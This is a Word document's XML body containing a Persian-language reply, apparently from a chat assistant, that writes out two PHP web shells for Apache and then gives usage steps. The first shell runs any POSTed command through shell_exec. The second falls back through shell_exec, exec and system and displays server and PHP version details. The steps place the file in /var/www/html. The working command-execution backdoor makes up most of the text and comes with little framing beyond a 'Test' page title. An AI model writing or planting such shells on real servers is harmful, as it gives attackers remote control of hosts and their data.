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11" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>آهان! حالا متوجه شدم.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PHP Web Shell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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>کد</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP Web Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="0088091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80911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>// webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    $command = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">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shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($command);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>title&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Apache PHP Web Shell - Test&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;h2&gt;Command Execution Interface&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;form method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="text" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" placeholder="Enter command" style="width</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:400px</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="submit" value="Execute"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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($_POST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'])): ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;h3&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;div style="background</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>f0f0f0; padding:10px; border:1px solid #</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ccc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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شده</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نسخه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شرفته‌تر</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="0088091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80911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>// advanced-webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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80911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>function_exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="0088091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shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> . ' 2&gt;&amp;1');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    } </w:t>
      </w:r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function_exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('exec')) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exec(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> . ' 2&gt;&amp;1', $output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> implode("\n", $output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    } </w:t>
      </w:r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function_exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('system')) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">       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80911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> . ' 2&gt;&amp;1');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="0088091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ob_get_clean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "No execution function available";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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($_POST['command'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd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'command'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    $output = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>executeCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>title&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>PHP Shell Interface&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="0088091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80911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> { font-family: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>monospace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; margin: 20px; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        .output </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{ background</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: #000; color: #0f0; padding: 15px; border-radius: 5px; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>input[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>type="text"] { width: 500px; padding: 5px; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;h1&gt;Apache PHP Web Shell&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;form method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">            &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>strong&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Command:&lt;/strong&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">            &lt;input type="text" name="command"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isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">($_POST['command']) ?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$_POST['command']) : '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -la'; ?&gt;" autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">            &lt;input type="submit" value="Execute"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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($output)): ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;h3&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;div class="output"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pre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($output); ?&gt;&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911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880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>small&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Server: &lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> echo $_SERVER['SERVER_SOFTWARE']; ?&gt; | PHP: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phpversion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(); ?&gt;&lt;/small&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>استفاده</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">1.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رو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Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>قرار بده</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">     /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/www/html/webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مراجعه به</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">     http://localhost/webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t xml:space="preserve">## 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t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911"/>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">)`: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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 و برگرداندن خروج</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880911" w:rsidRDefault="00880911" w:rsidP="00880911">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exec(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">)`: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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صورت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رفعال</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
